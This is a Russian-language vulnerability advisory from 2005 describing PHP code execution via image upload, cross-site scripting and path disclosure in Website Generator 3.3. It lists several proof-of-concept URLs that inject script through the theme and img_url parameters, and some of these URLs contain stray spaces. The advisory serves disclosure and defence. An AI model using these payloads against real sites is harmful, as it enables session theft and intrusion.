Security Lab

PHP-инклюдинг и межсайтовый скриптинг в Website Generator

Дата публикации:21.07.2005
Всего просмотров:1426
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Website Generator 3.3

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе.

Удаленный пользователь может загрузить файл с расширением .jpeg, содержащий PHP код и затем выполнить его на целевой системе.

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[path]/spaw/img_popup.php?img_url="
%20border="0"/><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/colo rpicker.php?
theme="><body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/table.php?theme=">
< body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/td.php?theme=">
< body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/confirm.php?theme=">
< body><script>aler t(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/a.php?theme=">
< body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/banner_l ibrary.php?
theme="><body><script>alert(document.cookie)</script>

Удаленный пользователь может получить данные об установочной директории приложения на сервере с помощью специально сформированного URL. Пример:

http://[target]/[path]/spaw/spaw_control.class.php

URL производителя: http://www.freehostshop.com/files/index.php?id=1

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Website Generator 3.3 Multiple vulnerabilities